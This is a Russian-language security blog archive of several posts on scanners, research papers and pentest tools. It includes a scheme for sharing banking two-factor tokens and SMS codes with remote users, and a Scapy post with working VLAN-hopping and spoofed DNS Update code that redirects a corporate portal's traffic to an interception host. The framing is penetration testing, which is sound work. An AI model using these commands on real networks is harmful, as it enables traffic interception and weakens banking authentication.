Архив

Posts Tagged ‘инструменты’

Совместный удаленный доступ к ДБО

Решил поделиться решением задачи по совместному удаленному доступу к ДБО, вдруг кому-то будет полезно.

Итак, дано:
Есть доступ в систему ДБО. Логин-пароль, вход подтверждается по SMS, вход возможен только при наличии eToken’а класса Aladdin Pro. Подпись документов, отправляемых в банк, происходит тоже с помощью ключей.

Требуется:
Организовать возможность доступа в систему ДБО в общем случае N удаленных людей.

Решение:
Вся инфраструктура в нашей локальной сети доступна удаленным пользователям через OpenVPN. В локальной сети поднимается виртуальная машина, в хост в USB вставляется eToken и подключается к виртуальной машине. На виртуальную машину устанавливается ПО USB over Network, которое позволяет подключить удаленное USB-устройство к локальной машине так же, как если бы оно было вставлено в локальный USB-порт. Далее eToken расшаривается для удаленного доступа, конечно с паролем.

Теперь SMS. Берется любой планшет или телефон на Android, ставится программа SMS Forwarder, в которой задается правило: все смс с такого-то номера отправлять на такие-то почтовые адреса. Android-устройство подключатся к WiFi-сети нашей инфраструктуры. Очевидно, в устройстве должна стоять та SIM-карта, на которую приходят одноразовые пароли.

Works like Charm.

p.s. Чего-то мне кажется, что всякие банковские трояны используют эту схему уже давно. Полагаю, спецы подтвердят.

Реклама

Обеспечение безопасности расширений в корпоративных информационных системах

Сегодня в рамках семинара RISSPA на конференции InfoSecurity Russia представлял доклад на тему «Обеспечение безопасности расширений в корпоративных информационных системах». Надеюсь, не переборщил с «систематичностью» и «научностью». Обсуждение в конце доклада — на 5 баллов! )

Lessons learned: как надо и как не надо сравнивать сканеры

Уже не первый год мне интересна тема сравнения сканеров уязвимостей (посты по теме — раз, два и три). В небольшой серии постов под названием «Lessons learned» я поделюсь своим видением проблемы — надеюсь, кому-то это окажется полезным в систематизации его миропредставления.
Первая тема — это критерии сравнения сканеров. Тег «Далее»

SQL injection scanner benchmark

Наконец дошли руки опубликовать наш подход для тестирования эффективности сканнеров SQLi (на английском, правда). Там же ссылка на виртуальную машину с самой средой — можете попробовать запустить свой или коммерческий сканер.
В скором времени появится уже полноценная статья.

Особое спасибо Кариму Валиеву за титанический труд по реализации среды.

p.s. Если есть предложения по публикации в каком-нибудь журнале — мы только за :)

Detecting Insufficient Access Control in Web Applications

В начале июля десант из трех человек (Денис Гамаюнов, Гоша Носеевич и я) нашего семинара по безопасности на ВМиК высадился в Амстердаме. Город-мечта любого молодого ученого, что уж говорить! Боевая задача — участие в конференциях SysSec и DIMVA.
Мы с Гошей представляли статью «Detecting Insufficient Access Control in Web Applications». С удовольствием публикую наши материалы, подготовленные к конференции.

— Презентация:

Скачать в PDF можно отсюда.

— Сама статья «Detecting Insufficient Access Control in Web Applications«.

— Исходный код нашего средства можно зачекаутить на Google Code. Отдельно стоит отметить, что инструмент не стоит рассматривать как Allmighty GUI-based Security Scanner. Это скорее набор кода, который может помочь пентестеру веб-приложений, если а) пентестер умеет программировать на Java b) сможет разобраться в чужом коде. Мы, используя этот код, нашли новые уязвимости в нескольких живых веб-проектах, так что оно скорее живое, чем мертвое :)

Взгляд на поездку от другого участника, Гоши Носеевича, тут.

Инструменты для обнаружения DOM-based XSS

Не могу не поделиться новостью о выходе еще одного инструмента для обнаружения DOM-based XSS, в этот раз от Stefano Di Paola из Minded Security.
До этого момента мне был знаком только один исправно работающий инструмент, находящий DOM-based XSS — это IBM AppScan, который применяет статический taint-анализ JavaScript’а.
Вроде бы еще Тарас рассказывал о модуле для w3af, который предназначен для той же цели. Возможно, он оставит более подробный комментарий.
И вот теперь вышел инструмент DOMinator, который использует динамический анализ JavaScript’а. Очень любопытно, как он себя покажет в деле (пока руки не дошли попробовать). Скачать бета-версию можно отсюда.

Scapy: швейцарский нож пентестера

Типичной задачей во время тестирования защищенности сетевой инфраструктуры является spoofing служебных протоколов: ARP, DHCP, DNS, SNMP и т.п. Вот лишь небольшой перечень интересных тестов:
ARP spoofing/DNS spoofing;
VLAN hopping;
— управление DNS-сервером с помощью DNS Update‘ов с IP-адресов из management-сегмента (не без IP spoofing);
— управление сетевыми устройствами через SNMP с IP-адресов из management-сегмента (не без IP spoofing).
Для проведения каждой атаки есть специализированные инструменты. Однако мне больше по нраву Scapy — настоящий швейцарский нож. Scapy позволяет написать на питоне небольшой сценарий по отправке пакетов практически с произвольным содержанием полей! Например, добавить два, три, чытере VLAN-тега:

sendp(Ether(dst='ff:ff:ff:ff:ff:ff', src='00:01:02:03:04:05')/Dot1Q(vlan=1)/Dot1Q(vlan=10)/IP(dst='255.255.255.255', src='192.168.0.1')/ICMP())

А вот как можно использовать DNS Update с подменой IP-адреса для управления A-записями локального DNS-сервера:

e=Ether()
i=IP(src="192.168.128.58",dst="10.10.0.253")
u=UDP(sport=5353,dport=53)
dns=DNS()
dns.id=12345
dns.opcode=5
dns.qdcount=1
dns.ancount=1
dns.nscount=1
dns.qd=DNSQR(qname="company.any",qtype="SOA",qclass="IN")
dns.an=DNSRR(rrname="portal.company.any",rclass="ANY",type=255,ttl=0)
dns.ns=DNSRR(rrname="portal.company.any",rclass="ANY",type=255,ttl=0)
sendp(e/i/u/dns)
dns.ancount=0
dns.an=None
dns.ns=DNSRR(rrname="portal.company.any",type="A",ttl=200,rdata="10.1.3.13")
sendp(e/i/u/dns)

Где 10.10.0.253 — адрес DNS-сервера, 192.168.128.58 — адрес из management-сегмента (а иначе DNS-сервер не примет Update), а 10.1.3.13 — адрес нашего хоста, на котором мы поднимем прокси-сервер и будем слушать HTTP-трафик, идущий на корпоративный портал portal.company.any.

Список поддерживаемых протоколов внушает (можно даже лепить кадры протокола 802.11, который ВиФи). Всем интересующимся очень рекомендую познакомиться — обязательно полюбите этот инструмент.